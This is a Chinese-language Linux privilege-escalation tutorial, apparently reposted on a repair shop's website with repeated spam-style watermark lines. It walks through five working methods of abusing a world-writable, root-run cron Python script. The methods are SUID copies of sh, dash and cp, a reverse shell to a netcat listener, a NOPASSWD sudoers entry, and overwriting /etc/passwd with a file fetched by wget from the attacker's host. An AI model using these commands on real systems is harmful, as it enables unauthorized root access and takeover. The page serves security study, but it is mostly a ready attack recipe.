EqLlyHJ5w6,694hQRgLWm

如何運用在Linux上通過可寫文件獲取Root權限的多種方法

來源:濟南磐龍筆記本交換機維修作者:濟南磐龍維修網址:http://caifu17199.cn

如何運用在Linux上通過可寫文件獲取Root權限的多種方法!濟南磐龍維修



Linux中,一切都可以看做文件,包括所有允許/禁止讀寫執行權限的目錄和設備。當管理員為任何文件設置權限時,都應清楚并合理為每個Linux用戶分配應有的讀寫執行權限。在本文中我将為大家展示,如何利用Linux中具有寫入權限的文件/腳本來進行提權操作。好了,話不多說。下面就進入我們的正題吧!caifu17199.cn

首先,我們來啟動我們的攻擊機并滲透進目标系統直至提權階段。這裡假設我通過ssh成功登錄到了受害者機器,并訪問了非root用戶的終端。通過以下命令,我們可以枚舉所有具有可寫權限的二進制文件。

find
/
-writable
-type

f
2>/dev/null
|
grep
-v
"/proc/"

可以看到在/lib/log路徑下有一個python文件,我們進入到該目錄并查看該文件的權限為777

如何運用在Linux上通過可寫文件獲取Root權限的多種方法!濟南磐龍維修

通過cat命令查看該文件内容,這是管理員添加的一個用來清除 /tmp中的所有垃圾文件的腳本,具體執行取決于管理員設置的定時間隔。獲取了這些信息後,攻擊者可以通過以下方式來執行提權操作。

如何運用在Linux上通過可寫文件獲取Root權限的多種方法!濟南磐龍維修

方法1

我們複制了/bin/sh/tmp下并為/tmp/sh啟用了SUID。使用編輯器打開sanitizer.py并将 “rm -r /tmp/*” 中的内容替換為以下兩行:

os.system('cp
/bin/sh
/tmp/sh')

os.system('chmod
u+s
/tmp/sh')

如何運用在Linux上通過可寫文件獲取Root權限的多種方法!濟南磐龍維修

一段時間後,它将在/tmp目錄内創建一個具有SUID權限的sh文件,當你運行它時,你将會獲取root訪問權限。

cd
/tmp

ls

./sh

id

whoami

下圖可以說明一切!

如何運用在Linux上通過可寫文件獲取Root權限的多種方法!濟南磐龍維修

方法2

同樣,你也可以将 “rm -r /tmp/*” 替換為以下内容:

os.system(‘chmod
u+s
/bin/dash)

如何運用在Linux上通過可寫文件獲取Root權限的多種方法!濟南磐龍維修

一段時間後,它将為/bin/dash設置SUID權限,并且在運行時會給予root訪問權限。

/bin/dash

id

whoami

如下圖所示:

如何運用在Linux上通過可寫文件獲取Root權限的多種方法!濟南磐龍維修

方法3

在這種方法中,我們在 rm -r /tmp/* 的位置粘貼了python反向shell連接代碼,并在新的終端中啟動了netcat偵聽。

如何運用在Linux上通過可寫文件獲取Root權限的多種方法!濟南磐龍維修

如上所述,經過一段時間後,我們通過netcat獲取了具有root訪問權限的反向shell

nc
-lvp
1234

id

whoami

如下圖所示:

如何運用在Linux上通過可寫文件獲取Root權限的多種方法!濟南磐龍維修

方法4

這個方法挺有意思的,在下圖中大家可以看到我當前的用戶是沒有執行sudo命令的權限的。那我們就想辦法讓自己成為suoders文件成員。

如何運用在Linux上通過可寫文件獲取Root權限的多種方法!濟南磐龍維修

同樣,我們将 “rm -r /tmp/*” 替換為以下内容:

os.system('echo
"wernerbrandes
ALL=(ALL)
NOPASSWD:
ALL"
>
/etc/sudoers')

如何運用在Linux上通過可寫文件獲取Root權限的多種方法!濟南磐龍維修

過一段時間後,當你輸入“sudo -l”命令時,你會注意到,它已成為了sudo用戶的成員。此時我們隻要輸入“sudo bash”就可以獲取root訪問權限。

sudo
-l

sudo
bash

id

方法5

我們知道passwd在任何類linux的系統中都扮演着非常重要的角色,一旦攻擊者有機會可以修改此文件,那麼它将會成為一種特權提升的動态方式。

同樣,我們也不會忽視這一點,使用cat命令讀取etc/passwd文件。

在這裡你可以觀察到用戶名為nemo記錄的高亮條目,根據我的猜測UID:1000 & GID:1000表示它應該是管理員組的成員。

但我們的目标是通過編輯nemo記錄,使其成為root組的成員。因此,我們選擇并複制etc/passwd文件内的所有記錄,然後将它粘貼到一個空的文本文件中。

如何運用在Linux上通過可寫文件獲取Root權限的多種方法!濟南磐龍維修

然後在一個新的終端中使用openssl生成一個加鹽密碼并複制。

openssl
passwd
-1
-salt
abc
123

如何運用在Linux上通過可寫文件獲取Root權限的多種方法!濟南磐龍維修

現在将上面複制的加鹽密碼粘貼至用戶nemo記錄條目中的“X”處,并且将UID&GID更改為0,如圖所示。操作完成後,将文本文件保存為“passwd”,将該文件傳輸至目标系統,它将覆蓋原始passwd文件的内容。

cd
Desktop

python
-m
SimpleHTTPServer
80

如何運用在Linux上通過可寫文件獲取Root權限的多種方法!濟南磐龍維修

同樣,将 “rm -r /tmp/*” 替換為以下内容:

os.system(‘chmod
u+s
/bin/cp)

一段時間後,它會啟用/bin/cpSUID位以複制任意文件。

如何運用在Linux上通過可寫文件獲取Root權限的多種方法!濟南磐龍維修

現在将被你修改過的passwd文件下載至目标系統的/tmp目錄中。讓我們來檢查一下/bin/cp是否啟用了SUID位,然後使用cp命令将修改的passwd文件複制到/etc/passwd中,這将覆蓋原始passwd文件的内容。

cd
/tmp

wget
http://192.168.1.103/passwd

ls
-al
/bin/cp

cp
passwd
/etc/passwd

如何運用在Linux上通過可寫文件獲取Root權限的多種方法!濟南磐龍維修

現在,我們鍵入以下命令查看修改内容是否已在passwd文件中生效。

tail
/etc/passwd

可以看到修改内容已成功寫入!

如何運用在Linux上通過可寫文件獲取Root權限的多種方法!濟南磐龍維修

執行以下命令獲取root訪問權限:

su
nemo

password
123

whoami

如何運用在Linux上通過可寫文件獲取Root權限的多種方法!濟南磐龍維修


EqLlyHJ5w6